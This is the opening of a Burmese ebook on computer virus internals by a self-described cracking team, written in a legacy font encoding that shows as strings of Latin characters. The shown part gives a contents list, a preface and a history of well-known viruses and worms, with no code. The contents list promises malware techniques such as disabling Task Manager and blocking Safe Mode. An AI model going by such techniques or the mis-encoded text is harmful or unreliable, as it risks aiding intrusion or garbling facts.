The Virus Internals

The Viruses : Internals V 1.
0 - rhythm (Myanmar Cracking Team) 1

The Viruses : Internals V 1.0
rmwdum
pmrsufESm
pOf taMumif;t&m
rS xd
1 pum;rdwfquf 4 5
tcef;(1)
uGefysLwmAdkif;&yfpfrsm;\ ordkif;aMumif; 6 10
tcef;(2)
Adkif;&yfpftrsdK;tpm;rsm;ESifh vu©Pmrsm; 11 25
3 Malware trsdK;tpm;rsm; 11 12
4 Akdif;&yfpfqdkonfrSm 12 13
5 Adkif;&yfpfuk'f ul;pufjcif;toGifjzifh tvkyfvkyfyHk 13 15
6 Adkif;&yfpfuk'f wdkufcdkufjcif;toGifjzifh tvkyfvkyfyHk 15 15
7 uGefysLwmAkdif;&yfpfrsm; zefwD;Mujcif; taMumif;&if; 16 16
8 Adkif;&yfpfuJhodkY wdkufcdkuyf Hkjcif;&m wlnDrIrsm; 16 16
9 Akdif;&yfpf Hoax rsm; 17 17
10 Akdif;&yfpfwdkufcdkufrI vu©Pmrsm; 17 18
11 Adkif;&yfpftrsdK;tpm; cGJjcm;jcif; 18 23
12 udk,fwdkifuk'fjyifEdkifaomAdkif;&yfpfrsm; 23 25
tcef;(3)
uGefysLwmtvkyfvkyfyHk 26 38
13 Windows XP/2000/NT Startup Process 26 28
14 Windows NT Kernel 28 29
15 Windows Logon Process (Winlogon) 29 31
16 Windows Vista Startup Process 31 31
17 owdxm;oifhaom zdkiftrsdK;tpm;rsm; 31 35
18 Windows Registry 36 36
19 Windows pepf pwifcsdefwGif y½dk*&rfrsm;tm; tvkyfvkyfapjcif; 36 37
The Viruses : Internals V 1.0 - rhythm (Myanmar Cracking Team) 2

pmrsufESm
pOf taMumif;t&m
rS xd
20 Registry Editor ESifh Task Manager tm; toHk;jyKcGifhr&atmif wm;qD; 37 37

jcif;
21 Control Panel rS Folder Option tm;azsmufjcif; 37 38
22 Safe Mode rS Boot vkyfí r&ap&ef jyKvkyfjcif; 38 38
tcef;(4)
emrnfausmfAdkif;&yfpfrsm; 39 52
23 ed'gef; 39 39
24 enf;ynmydkif;qdkif&m xdcdkufrIrsm; 39 39
25 usifh0wfESifh rlydkifcGifhqdkif&mxdcdkufrIrsm; 39 39
26 pdwfydkif;qdkif&m xdcdkufrIrsm; 40 40
27 Stoned Adkif;&yfpf 40 43
28 a*s½kqvifAdkif;&yfpf 43 43
29 Morris Worm 43 47
30 The Concept Adkif;&yfpf 47 48
31 Melissa Worm 48 49
32 Loveletter Worm 49 50
33 The Anna Kournikova Adkif;&yfpf 50 51
34 CodeRed 51 52
tcef;(5)
jynfwGif;jzpf Adkif;&yfpfrsm; 53 65
35 ed'gef; 53 53
36 Magway FC Adkif;&yfpf 53 62
37 Thayet Myo Hacking Day Adkif;&yfpf 62 63
38 Loikaw Adkif;&yfpf 63 63
39 Happy Birthday Adkif;&yfpf 63 64
40 One Missed Call Adkif;&yfpf 64 64

pmrsufESm
pOf taMumif;t&m
rS xd
41 Kolay Adkif;&yfpf 64 65
tcef;(6)
Akdif;&yfpf&eftm;umuG,fjcif; 66
42 Adkif;&yfpf\ tqifhrsm; 66 66
43 ½dk;&Sif;aomAdkif;&yfpfrsm;zefwD;jcif; 66 67
44 Adkif;&yfpfzefwD;Edkifaom Kit rsm; 67 68
45 Adkif;&yfpfrsm;tm; pHkprf;&SmazGjcif; enf;vrf;rsm; 68 68
46 pHkprf;ppfaq;jcif; 68 69
47 zdkifrsm;\ Integrity udkppfaq;jcif; 69 69
48 Interceptor rsm;udktoHk;jyKjcif; 69 69
49 Adkif;&yfpfrsm;tm; cGJjcrf;pdwfjzmjcif; 70 71
50 Adkif;&yfpfrsm;tm; umuG,fjcif; 71 72
52 udk;um;usrf;pm&if; 73 73

pum;rdwfquf
1/ ,aeYrsufarSmufacwfwGif enf;ynmrsm; t&Sdeft[kefjrifh wdk;wufvsuf&Sdayonf/ ¤if;
teuf uGefysLwmenf;ynmonf zGHYNzdK;wdk;wufrI tjrefqHk;jzpfonf/ Microsoft rS Windows XP udk
xkwfvkyfNyD;aemufydkif;? Intel rS Processor rsm;udk aps;EIef;oufompGmjzifh xkwfvkyfa&mif;csNyD;
aemufydkif;wGif Desktop uGefysLwmrsm;? Laptop uGefysLwmrsm; oHk;pGJrIonf tHhrcef;wdk;wufvmcJhay
onf/ uGefysLwmenf;ynmwdk;wufvmjcif;aMumifh tcsdefukefoufomjcif;? vlUpGrf;tm;acRwmEdkifjcif;?
aiGaMu;ukefusrIoufomvmjcif; ponfhtusdK;aus;Zl;rsm;udk cHpm;vm&ovdk uGefysLwmenf;ynmudk
tvGJoHk;pm;jyKNyD; uGefysLwmpepfrsm;\ tm;enf;csufrsm;udk tajccHí raumif;rIusL;vGefvmMuonfh
jzpfpOfrsm;udkvnf; BuHKawGYvmMu&ygonf/
2/ uGefysLwmenf;ynmzGHYNzdK;wdk;wufrIwGif aqmhzf0Jvfenf;ynmzGHYNzdK;wdk;wufrI (Software
Development) onf ta&;ygaomtcef;u@jzpfvmNyD; rwlnDaom pufvnfywfrIpepf (Operating
System) rsm;wGif rwlnDaom y½dk*&rfbmompum;rsm;jzifh aqmhzf0Jvfrsm;udk a&;om;zefwD;vmMuyg
onf/ tusdK;jyKaqmhzf0Jvfrsm; ajrmufrsm;pGmay:xGufvmouJhodkY wpfzufwGifvnf; uGefysLwmpuf
vnfywfrIpepfudk taESmifht,Sufjzpfaprnfh uGefysLwmAdkif;&yfpfrsm;vnf; ay:xGufvmcJhMuygonf/
3/ uGefysLwmenf;ynm tajccHtm;enf;aomolrsm;yifjzpfap? uRrf;usifaom ynm&Sifrsm;
yifjzpfap uGefysLwmAdkif;&yfpfrsm;\ tEÅ&m,fudk tenf;ESifhtrsm; rvGJraoG BuHKawGYcJh&ygonf/
uGefysLwmAdkif;&yfpfrsm;aMumifh ysufpD;qHk;½HI;rI ajrmufrsm;pGmBuHKawGUcJh&ovdk? pdwftaESmifht,Sufjzpf
jcif;? tcsdefukefapjcif; ponfh qdk;usdK;rsm;udk cHpm;apcJh&ygonf/ xif&Sm;aomom"urSSm 2010
ckESpfwGif tD&ef\e,luvD;,m;puf½Hkrsm;udk ypfrSwfxm;wdkufcdkufcJhonfh Stuxnet Adkif;&yfpfaMumifh
tD&efwdkY\ e,luvD;,m;tpDtpOfrsm; aESmifhaES;apcJhjcif;jzpfonf/ ,cktcgwGif uGefysLwmAdkif;&yfpf
rsm;onf uGefysLwmpufvnfywfpepfudk zsufqD;½HkrQruawmhbJ owif;tcsuftvufrsm; cdk;,ljcif;
ponfh vkyfaqmifcsufrsm;udkyg vkyaf qmifvmMuonfhtwGuf EkdifiHawmfvHkNcHKa&;udkyif xdyg;vmEdkif
onfudk awGY&ayonf/ xdkYaMumifh uGefysLwmAdkif;&yfpfrsm;\tEÅ&m,frS umuG,fEkdif&eftwGuf
Adkif;&yfpf&efumuG,fonfh Anti-virus aqmhzf0Jvfrsm;a&;om;cJhMuNyD; Adkif;&yfpftEÅ&m,frS umuG,fEkdif
&ef BudK;yrf;cJhMuayonf/
4/ ,aeYacwfwGif uGefysLwmoHk;pGJolrsm;onf Anti-virus aqmhzf0Jvfrsm;toHk;jyKvQif
Adkif;&yfpfrsm;&efudk t<uif;rJhumuG,fEkdifrnf[k rSm;,Gif;pGm ,lqaeMuygonf/ taumif;qHk; Anti-
virus aqmhzf0Jvfrsm;wGif tm;omcsuf rnfrQyif&Sdapumrl aemufqHk;xGuf&Sdaom Adkif;&yfpfrsm;udk
rod&Sd? rz,f&Sm;yg/ Anti-virus rsm;onf ,cifh,cifxGuf&Sdzl;aom? wdkufcdkufzsufqD;zl;aom Adkif;&yfpf
rsm;udkom od&SdEdkifayonf/ ,aeYacwfwGif vli,frsm;onf y½dk*&rfa&;om;jcif;bufwGif pdwfyg
0ifpm;vmjcif;ESifhtwl Adkif;&yfpfrsm;udk vufwnfhprf;a&;om;vmMuonfudk awGYjrifvm&ygonf/
xdkAdkif;&yfpfrsm;udk Anti-virus tm;vHk;u pHkprf;od&SdEdkifjcif; r&SdMuyg/ xdkYaMumifh Adkif;&yfpftEÅ&m,fudk
t<uif;rJhumuG,fEkdifa&;onf rdrdudk,fwdkif Adkif;&yfpfESifhywfoufaom A[kokwjynfhpHkcJhrSom NyD;jynfh
pHkEdkifrnfjzpfygonf/
5/ Adkif;&yfpfwdkY\ zsufqD;rItEÅ&m,fESifh owif;tcsuftvufrsm;udk od&SdEkdi½f HkrQjzifh Adkif;&yfpf
tEÅ&m,fudk txdkuftoifhom umuG,fEkdifrnfjzpfonf/ aqmhzf0Jvfydkif;ESifhoufqdkifaom Reverse
Engineering bmom&yfudkavhvmxm;NyD; y½dk*&rfa&;om;jcif;udk uRrf;usifydkifEkdifolrsm;om Adkif;&yfpf

&efudk &mEIef;jynfheD;yg; umuG,fEkdifrnfjzpfygonf/ xdkYaMumifh Reverse Engineering bmom&yfudk
uRrf;usifydkifEdkifrI&Sdap&ef vlUpGrf;tm;t&if;tjrpfrsm; arG;xkwfay;&ef vdktyfygonf/
6/ þpmtkyfjzpfay:vmyHkrSm oifwef;wpfckwGif pmwrf;tjzpfwifoGif;&ef &nf½G,fjcif;rS
pwifygonf/ pmwrf;wpfckjzpfajrmuf&eftwGuf vdktyfaomt&if;tjrpfrsm;udk &SmazG&mwGif tcsdef
uefYowfcsuf&SdonfhtwGuf þpmtkyfonf jynfhpHkvHkavmufaom tcsuftvufrsm;udk ay;Ekdifrnf
r[kwfaMumif;vnf; 0efcHvdkygonf/ rlvu þpmtkyftm; xkwfa0&ef tpDtpOfr&Sdao;yg/ xyfrH
jznfhpGufcsufrsm;jznfhpGufNyD;rS xkwfa0vdkonfhqE´&Sdygonf/ odkYaomfvnf; pmzwfolrsm;vufxJodkY
apmvsifpGm jzefYcsDvdkonfhqE´vnf;&SdonfhtwGuf jzefYa0&jcif;jzpfygonf/ xkdYaMumifh rjynhfpHkrIrsm;?
tm;enf;csufrsm;? trSm;t,Gifrsm; ygvmygu em;vnfcGifhvTwfapvdkygonf/
7/ Adkif;&yfpftaMumif;ESifhywfoufí tGefvdkif;wGif tcrJha&;om;jzefYjzL;xm;aompmtkyfrsm;?
yHkESdyfxkwfa0xm;aom pmtkyfrsm;udk zwfNyD;uwnf;u tpmraMuaomtcsufrsm; jzpfcJhrdygonf/
Adkif;&yfpfESifhywfoufonfh rSm;,Gif;aomoHk;oyf,lqcsufrsm;? Adkif;&yfpfrsm;taMumif; jynfhjynhfpHkpHk
a&;om;azmfjyEdkifrIr&Sdjcif;wdkYu Adkif;&yfpfESifhywfoufaompmtkyfwpftkyfudk a&;om;vdkaom tmoDo
udkjzpfapcJhygonf/ pmtkyfpmwrf;wpfckwGif taMumif;t&m jynfhpHkrIr&Sdonfudk vufcHem;vnfay;í
&aomfvnf; Adkif;&yfpf\oabmobm0? tvkyfvkyfyHkudk aumif;pGmem;vnfjcif;r&SdbJ rSm;,Gif;oHk;
oyfjcif;u pmzwfoludk tEÅ&m,fjzpfapygonf/ aemufwpfcsufaqG;aEG;vdkonfrSm pma&;om;&mwGif
pmzwfol txiftjrifBuD;ap&ef zdefYvHk;? vSdrfhvHk;rsm; oHk;jcif;jzpfygonf/ pmzwfonfqdkonfrSm
taMumif;t&mwpfckudk ukd,frod&Sdí zwfjcif;jzpfEdkifovdk? rdrdod&SdNyD;om; taMumif;t&mwpfckckudk
tjcm;olrsm; rnfuJhodkYxifjrifonfudk odvdkí zwfjcif;vnf;jzpfEdkifygonf/ pmzwfolrsm;onf pma&;
olxuf ydkrdkod&SdwwfuRrf;olrsm;vnf; trsm;BuD; &SdEdkifygonf/ pmtkyfwpftkyfudk a&;om;jcif;\
t"du&nf½G,fcsufrSm udk,f&nfaoG;&mvdkjcif;xuf rdrdwifjyvdkaom taMumif;t&mudk pmzwfolrsm;
em;vnfod&Sdapa&;onfom t"duusonf[k jrifygonf/ Adkif;&yfpfESifhywfoufaomuk'frsm;udkvnf;
twwfEdkifqHk;jynfhjynhfpHkpHk azmfjyay;xm;ygonf/ pmzwfolrsm;udk ajymMum;vdkonfhtcsufrSm Adkif;&yfpf
uk'frsm;udk yHkwlul;cstoHk;csjcif;xuf ¤if;uk'frsm;tvkyfvkyfyHkudkom OD;pm;ay;avhvmapvdkygonf/
8/ þpmtkyfa&;om;&mwGif aus;Zl;wifxdkufolrsm;&Sdygonf/ jynfwGif;jzpfAdkif;&yfpfrsm;t
aMumif;a&;om;&eftwGuf uRefawmfhwGif jynfwGif;jzpfAdkif;&yfpfrsm;r&Sdyg/ xdkYaMumifh jynfwGif;jzpfAdkif;
&yfpfrsm;udk ay;ydkYay;&eftwGuf tGefvdkif;wGifarwåm&yfcHcJhygonf/ tGefvdkif;rS nDi,fwpfOD;jzpfaom
opfyifu uRefawmfhtwGuf jynfwGif;wGiful;pufysHUyGm;cJhaom Akdif;&yfpfrsm;? jynfwGif;rSa&;om;aom
rauG;tufzfpDAdkif;&yfpfudk ay;ydkYay;cJhygonf/ nDav;opfyiftm; OD;pGmaus;Zl;wifvdkygonf/ tjcm;
aomaus;Zl;wifxkduforl sm;rSm þpmtkyfjzpfajrmufa&;twGuf wGef;tm;jzpfapcJhaom uRefawmf\
oli,fcsif;jzpfol WML ESifh pmtkyfrsufESmzHk;a&;qGJay;cJhaom ZMA wdkYjzpfygonf/
9/ þpmtkyfa&;om;aomtcsdefwGif uRefawmfhwGif rauG;tufzfpDAdkif;&yfpfwpfckom&Sdae
onfhtwGuf xkdAdkif;&yfpfwpfcktaMumif;udkom tao;pdwfoHk;oyfEdkifcJhygonf/ tvm;wl jynfwGif;
wGiful;pufcJhaom Adkif;&yfpfrsm;udkvnf; tcsdeftcuftcJaMumifh avhvmEkdifjcif; r&SdcJhyg/ aemufxyf
a&;om;azmfjyvdkonfh Polymorphic Adkif;&yfpfESifh Metamorphic Adkif;&yfpfrsm;udkrl aemifxGuf&Sdrnfh
Version rsm;wGif xnfhoGif;azmfjyay;rnfjzpfaMumif; today;tyfygonf/
rhythm (Myanmar Cracking Team)
(4-12-2013)

tcef;(1)
uGefysLwmAdkif;&yfpfrsm;\ ordkif;aMumif;
1/ uGefysLwmAdkif;&yfpfrsm;\ rlvtpudk jyefMunfhvQif 1949 ckESpfwGif ocsFmynm&Sif John
Von Neumann u ,aeYacwf uGefysLwmAdkif;&yfpfrsm;ESifh oabmcsif;qifaom udk,fwkdifyGm;y½dk*&rf
rsm;taMumif; azmfjycJhjcif;rS pwifcJhygonf/ odkYaomf 1960 rwdkifrDESpfrsm;twGif; vuf&SdAdkif;&yfpfrsm;
xuf a&S;usaom Adkif;&yfpfrsm;udk awGY&Sdjcif; r&SdcJhyg/ ¤if;aemuf q,fpkESpftwGif; y½dk*&rfrmwpfpku
Core Wars [ktrnf&aom *drf;wpfckudk zefwD;cJhMuygonf/ xdk*drf;onf oltvkyfvkyfonfhtcsdefwdkif;
wGif y½dk*&rfrsm; yGm;aewwfNyD; tjcm;*drf;upm;olwpfa,muf\ uGefysLwmrSwfOmPfudkyif jynfhap
onftxd jzpfcJhonf/ xdk*drf;udkzefwD;olrsm;uyif yxrqHk; Anti-virus [kqdkEdkifaom Reeper y½dk*&rf
udka&;om;cJhNyD; xkdy½dk*&rfonf Core Wars \ udk,fyGm;rsm;tm; zsufqD;jcif;udk jyKvkyfcJhygonf/ rnf
odkYqdkapumrl 1983 ckESpfwGif ¤if;y½dk*&rfrmrsm;xJrSwpfa,mufu Core Wars rsm;&SdcJhaMumif;
emrnfBuD;odyÜHr*¾Zif;wpfapmifwGif xkwfazmfcJhonf/ þtaMumif;onf uREkfyfwdkY,aeYac:a0:aeMu
aom uGefysLwmAdkif;&yfpfrsm;\ tpjzpfcJhygonf/ ¤if;ESpfwGifyif Fred Cohen u ol\usrf;jyKpmwrf;
wGif ]uGefysLwmAdkif;&yfpfqdkonfrSm tjcm;uGefysLwmy½dk*&rfrsm;tm; jyKjyifNyD; olUukd,fpm;yGm;rsm;ap
aom uGefysLwmy½dk*&rfwpfck} [k t"dyÜm,fzGifhqdkcJhygonf/
2/ xdktcsdefü MS-DOS (Microsoft Disk Operating System) onf urÇmwpfvTm;wGif
NydKifbufuif;pufvnfywfrIpepf jzpfawmhrnfjzpfygonf/ ¤if;pepfonf aqmhzf0JvfzGHYNzdK;wdk;wufrI
twGuf tvm;tvmaumif;rsm; jzpfapcJhaomfvnf; Hardware ydkif;qkdif&mrjynfhpHkrIrsm; &SdaecJhyg
onf/ þuJhodkY rjynfhpHkrIrsm;&SdcJhonfhwdkif MS-DOS onf 1986 ckESpfwGif Adkif;&yfpfwpfrsdK;\ ypfrSwf
jzpfcJh&ygonf/ xdkAdkif;&yfpfum; ygupöwefEkdifiHom;ESpfOD;jzpfaom Basit ESifh Amjad wdkYzefwD;cJhaom
Brain Adkif;&yfpfjzpfNyD; Floppy Disk \ Boot Sector rsm;tm; ul;pufapum Disk xJ&Sdtcsuftvufrsm;
tm; zwf½Iír&EdkifatmifjyKvkyfayonf/ Adkif;&yfpful;pufcHxm;&aom Floppy Disk rsm;wGif ]© Brain}
trnfudk awGU&Sd&ygonf/ xkdESpfwGifyif yxrqHk;aom x½dk*sef (Trojan) jzpfaom PC-Write
Application arG;zGm;cJhaMumif; awGYjrifcJh&ygonf/
3/ rMumrDwGif Adkif;&yfpfa&;om;olrsm;u zdkifrsm;udk ul;pufjcif;onf pufvnfywfrIpepfrsm;

tm; ydkí'ku©ay;EdkifaMumif; oabmaygufvmMuonf/ 1987 ckESpfwGif yxrqHk;aom zdkifrsm;udk
ul;pufapaom Suriv-02 Adkif;&yfpf ay:aygufvmcJhNyD; .com zdkifrsm;udk ul;pufcJhum emrnfqdk;
Adkif;&yfpfrsm;jzpfaom Jerusalem (ac:) Viernes 13 wdkYudk vrf;zGifhay;cJhonf/ Jerusalem Adkif;&yfpfonf
13&ufajrmufaeY aomMuma&mufwkdif; touf0ifvmNyD; .exe ESifh .com zdkifrsm;udk ul;pufapum
xdkaeYwGiftvkyfvkyfaom y½dk*&rfwdkif;udk zsufqD;ypfavonf/ uGefysLwmoHk;pGJolrsm;\ y½dk*&rfaygif;
aomif;ESifhcsDí zsufqD;EdkifcJhonf/ 1988 ckESpfwGif Morris Worm ay:xGufvmcJhNyD; uGefysLwm
tvHk;a& 6000 tm; xdcdkufapcJhygonf/ Nascent tifwmeufudk csdwfqufxm;aom uGefysLwm
tm;vHk;\ 10% ul;pufcHcJhonf/ ¤if;udkzefwD;ol Cornell wuúodkvfrS bGJY&ausmif;om; Robert

Tappan Morris onf uGefysLwmydkif;qkdif&m vdrfvnfrIEiS fh tvGJoHk;pm;rIOya't& ta&;,lcH&aom
yxrqHk;yk*¾dKvfjzpfcJhonf/
4/ 1990 wGif Symantec rS yxrqHk;aom Anti-virus y½dk*&rfjzpfonfh Norton Anti-virus
udk jzefYjzL;cJhonf/ 1991 ckESpfwGif yxrqHk;aom Polymorphic Adkif;&yfpfjzpfaom Tequila Adkif;&yfpf
ysHUESHYcJhonf/ Polymorphic Adkif;&yfpfrsm;onf ul;pufrItopfwpfckjzpfwdkif; olwdkY\wnf&SdrItaetxm;
ajymif;vJaeaomaMumifh Adkif;&yfpfpHkprf;a&;y½dk*&rfrsm; (Scanners) udk pHkprf;&cufcJaponf/ 1992
ckESpfwGif Adkif;&yfpfta&twGuf 1300 xd&SdvmNyD; 1990 'DZifbmwGif&Sdaom Adkif;&yfpfrsm;xuf
420% wdk;yGm;vmcJhonfudk awGY&ygonf/ ¤if;ESpfrsm;wGifyif The Dark Avenger Mutation Engine
(DAME) udkzefwD;cJhMuNyD; xdk Toolkit onf ½dk;½dk;Adkif;&yfpfrsm;udk Polymorphic Adkif;&yfpfrsm;tjzpf
ajymif;vJay;onf/ tvm;wl Virus Creation Laboratory y½dk*&rfay:vmNyD; ¤if;onf yxrqHk;aom
wu,fhAdkif;&yfpfppfppfrsm;udk zefwD;xkwfvkyfay;aom Toolkit wpfckjzpfvmonf/
5/ 1994 ckESpfwGif Good Times tD;ar;vfaumvm[vonf uGefysLwmtzGJYtpnf;Mum;
ysHUESHYcJhonf/ xdkaumvm[vu ]tD;ar;vfacgif;pOftrnfwGif Good Times pmaMumif;ygaom
tD;ar;vftm;zGifhcJhvQif Hard Drive wpfckvHk;&Sd tcsuftvufrsm;ukd zsufqD;ypfvdrfhrnf}[k owday;
jcif;jzpfonf/ r[kwfrrSefaomfvnf; xdkaumvm[vonf ajcmufvrS q,fhESpfvMumwdkif; jyefvnf
ay:xGufvmavonf/ 1995 ESpfydkif;rsm;wGif Word Concept onf tysHUESHYqHk;aomAdkif;&yfpfjzpfvmNyD;
Microsoft Word zdkifrsm;wGif ysHUyGm;avonf/ uGefysLwmoHk;pGJolrsm;\ Document rsm;udk tD;ar;vfrsm;
rS jzefYoHk;pGJjcif;aMumifh Adkif;&yfpfysHUESHYrI vsifjrefapcJhonf/ 1996 ckESpfwGif Baza? Larous (Macro
Adkif;&yfpf) ESifh Staog Adkif;&yfpfwdkYonf Windows 95 \zkdifrsm;? Excel ESifh Linux wdkYudk ul;pufapcJhaom
yxrqHk; Adkif;&yfpfrsm;jzpfcJhonf/
6/ 1998 ckESpfwGif ay:aygufcJhaom StrangeBrew Adkif;&yfpfonf JAVA Class zdkifrsm;udk
ul;pufapcJhonf/ tvm;wlyif Chernobyl Adkif;&yfpfonfvnf; .exe zdkifrsm;rSwqifh vsifjrefpGm
ysHUyGm;cJhonf/ Chernobyl Adkif;&yfpfonf zdkifrsm;udkomwdkufcdkuf½Hkwifr[kwfbJ ul;pufcH&aomuGefysL
wmrsm;&Sd Flash BIOS rsm;udkyif wdkufcdkufcJhonf/ umvDzdk;eD;,m;jynfe,frS q,fausmfoufESpfOD;onf
ppfbuf? tpdk;&ESifh yk*¾vduuGefysLwmpepf 500ausmfudk xdk;azmufwdkufcdkufNyD; xdef;csKyfrI&,lcJhonf/
7/ 1999 ckESpfwGifay:aygufcJhaom Melissa Adkif;&yfpfonf tD;ar;vftaeESifhwGJygvmaom
Document zdkifxJ&Sd Macro wpfckudk tvkyfvkyfapNyD; uGefysLwmoHk;pGJol\ Outlook Address Book rS
vl 50 OD;qD ul;pufcH&aom Document udkydkYavonf/ xdkAdkif;&yfpfonf tjcm;aom Word Document
zdkifrsm;udkvnf;ul;pufNyD; xdkzdkifrsm;udk Attachement taejzifhwGJNyD;ydkYrdygu tjcm;olrsm;\ Word
Document rsm;udkvnf; ul;pufaprnfjzpfygonf/ Melissa onf tjcm;xGuf&SdNyD;aom Adkif;&yfpfrsm;
xuf ysHUyGm;rIvsifjrefcJhNyD; uGefysLwm wpfoef;cefYudk ul;pufapcJhygonf/ xkBuD;rm;aom tifwmeuf
oHk;pGJrIrsm;aMumifh Intel ESifh Microsoft wdkY\ Mail Server rsm; ,m,DydwfypfcJh&onf/ Bubble Boy onf
tD;ar;vfvufcHolrSrS Attachment zdkifudk zGifhp&mrvdkbJ tD;ar;vfudk zGifh½HkrQjzifh ul;pufapEkdifaom

yxrqHk;aom Worm jzpfcJhonf/ Tristate onf Word? Excel ESifh PowerPoint zdkifrsm;udk ul;pufapcJh
aom? yxrqHk;aom rsdK;rwlzdkifrsm;udk ul;pufapcJhaom Macro Adkif;&yfpfjzpfcJhonf/
8/ 2000 jynhfESpfwGif Love Bug [ktrnfwGifcJhaom Loveletter Worm onf Melissa uJhodkY
Outlook rSysHUyGm;cJhonf/ Loveletter Worm onf .vbs zdkiftaeESifhjzpfNyD; .mp2? .mp3 ESifh .jpg
ponfhzdkifrsm;zsufjcif;wdkYudkjyKvkyfNyD; User Name rsm;ESifh Password rsm;udk Adkif;&yfpfa&;om;olxH
ydkYapcJhonf/ Loveletter onf xGuf&SdNyD;aomAdkif;&yfpfrsm;xJwGif zsufqD;rItrsm;qHk;[k owfrSwfEdkifav
onf/ 9&uftwGif;üyif uGefysLwmaygif; oef; 50 ausmftm; ul;pufEdkifcJhonf/ W97M.Resume.A
onf Melissa Worm \ rsdK;uGJopfwpfckjzpfNyD; Word Macro udktoHk;jyKNyD; Outlook udkul;pufysHUESHYap
onf/ Stages Adkif;&yfpfonf b0ZmwfcHktaMumif; tajymiftysuftD;ar;vftjzpf [efaqmifNyD;
tifwmeufwavQmuf ysHUESHYcJhonf/ Stages onf .txt zdkif Extension twktaejzifh Attachment twGif;
ykef;atmif;aeNyD; tD;ar;vufvufcHolrsm;udk zGifhMunhfrdap&ef aoG;aqmifEdkif cJhonf/
9/ 9^11 wdkufcdkufrItNyD;wGifay:aygufcJhaom Nimda Worm onf uGefysLwmodef;ESifhcsDí
ul;pufcHcJh&NyD; ¤if;onf t½IyfaxG;qHk;aomAdkif;&yfpfrsm;xJwGif wpfcktygt0ifjzpfcJhonf/ rwlnD
aomrsdK;yGm;jcif;ESifh pepfrsm;udk ul;pufjcif; enf;vrf;5rsdK;yg&Sdonf/ Anna Kournikova Adkif;&yfpfonf
]tawGYtBuHKr&Sdaom y½dk*&rfrmrsm;u Toolkit jzifh vG,fvifhwul zefwD;a&;om;xm;aom Adkif;&yfpf
rsm;onf tEÅ&m,fr&SdEdkif} [k,HkMunfxm;aom Adkif;&yfpfrsm;tm;avhvmol (Malware Analyst) rsm;udk
pdk;&drfrIjzpfapcJhonf/ Attachment taejzihfwGJxm;onfh a'gifaumif;NyD;aMumh&Sif;aom wif;epfr,f
Anna Kournikova \"mwfyHktm; tD;ar;vfvufcHolrsm;u zGifhMunfhap&ef aoG;aqmifcJhonf/ Anna
Kournikova tm;pGJvef;aeaom e,fomvefrS vli,fy½dk*&rfrmwpfa,mufrS Adkif;&yfpfzefwD;cJhjcif;
omjzpfNyD; Message \aemufuG,fwGif rnfonfh"mwfyHkrQr&Sday/ tvm;wl jyóemtrsm;qHk;zefwD;Mu
aom Sircam? CodeRed? BadTrans wdkYESifhtwl Worm rsm; ysHUESHYrIwdk;yGm;vmMuonf/ CodeRed Worm
onf aysmhuGuf&Sdaom Webpage rsm;udk wdkufcdkufNyD; yxrqHk; 12em&DtwGif; Host aygif; 359000
udkul;pufapcJhonf/ Password rsm;ESifh Credit Card rsm;\ tcsuftvufrsm;udk apmihfzrf; cdk;,l&ef
BadTrans udka&;om;cJhonf/
10/ 2002 ckESpfwGif Melissa Adkif;&yfpfa&;om;oltm; axmif'Pf vESpfq,f csrSwfcJhonf/

LFM-926 Adkif;&yfpfay:xGufvmNyD; ]Loading.Flash.Movie} [laompmwef;udkjyoum Shockwave
Flash (.swf) zdkifrsm;udk ul;pufapcJhygonf/ emrnfausmftqdkawmftrnfrsm;ay;xm;aom Shakira?
Britney Spears ESifh Jennifer Lopez Adkif;&yfpfrsm; ay:xGufvmcJhonf/ Klez worm onf
tD;ar;vfrsm;tMum; ysHUESHYNyD; rl&if;zdkifrsm;udk zGufíaumfyDyGm;jcif;? Anti-virus y½dk*&rfrsm;udk
tvkyfrvkyfapjcif;? zdkifrsm;udk 00 Byte rsm;jzifh tpm;xdk;jcif;wdkYudk jyKvkyfavonf/ Bugbear Worm
onf ½IyfaxG;aom Worm wpfrsdK;jzpfNyD; ul;puf&mwGif enf;vrf;rsdK;pHkjzifh ul;pufavonf/
11/ 2003 ckESpfwGif ay:xGufvmcJhaom Slammer (Sapphire) Worm onf ysHUESHYrItjrefqHk;
jzpfcJhNyD; q,frdepftwGif; uGefysLwmtvHk;a& 75000 udk ul;pufapcJhonf/ ul;pufcH&onfh yxr

rdepfrSpí 8.5 puúefYMumwdkif; ul;pufrIonf ESpfqwdk;vmcJhonf/ Sobig Worm onf Spam
tzGJYtpnf;rsm;odkY qufoG,fonfh yxrqHk; Worm jzpfavonf/ ul;pufcHxm;&onfh uGefysLwmpepf
rsm;onf Spam xyfqifhyGm;&mae&mrsm;jzpfvmMuNyD; wdkufcdkuf&efa½G;cs,fxm;onfholrsm;odkY ar;vf
rsm; xkjzifhxnfjzifh yGm;rsm;&eftwGuf Spam jyKvkyfonfhenf;ynmrsm; &Sdavonf/
12/ 2004 ckESpf? Zefe0g&DvwGif MyDoom Worm (0g) Novarg onf tD;ar;vfrsm;ESifh
zdkifrsm;udk jyefvnfa0rQjzefYjzL;aomaqmhzf0Jvfrsm;rSwqifh ysHUESHYcJhNyD; xGuf&SdNyD;aom Adkif;&yfpfrsm;ESifh
Worm rsm;xuf ysHUESHUrI jrefavonf/ MyDoom onf tD;ar;vfvufcHolrsm;udk Attachment tm;
zGifhMunfh ap&ef jr§LqG,fqGJaqmifNyD; Hacker rsm;tm; ul;pufcHxm;&aomuGefysLwm\ Hard Drive
tm; toHk;jyKcGifh&&Sdaponf/ &nfrSef;csufyef;wdkifrSm SCO ukrÜPDtm; Denial of Service (DOS)
wdkufcdkufrI jyKvkyf&efjzpfonf/ SCO onf ol\ UNIX y½dk*&rfbmompum;\ Open-source Version
udk toHk;jyKaeMuaom tzGJYrsm;tm; w&m;pGJqdkaeonfh ukrÜPDwpfckjzpfonf/ SCO onf Worm a&;
onfholtm; zrf;qD;jypf'Pfcs&eftwGuf owif;ay;onfh rnfolUudkrqdk a':vm 2odef;cGJ csD;jr§ifhrnf
[k urf;vSrf;cJhonf/ arvwGif Windows udktoHk;jyKaom uGefysLwmwpfoef;cefYonf Sasser Worm
\ul;pufwdkufcdkufrIudk cHcJh&ygonf/ wdkufcdkufcH&olrsm;xJwGif NAdwdoQavaMumif;vdkif;? bPfrsm;?
NAdwdefurf;ajcapmifhwyftygt0if tpkd;&½Hk;rsm; yg0ifcJhavonf/ Worm onf uGefysLwm (odkY) tcsuf
tvufrsm;tm; jyifr&aomtEÅ&m,fay;rIrsm;udk rvkyfaomfvnf; uGefysLwmudk aES;auG;apjcif;?
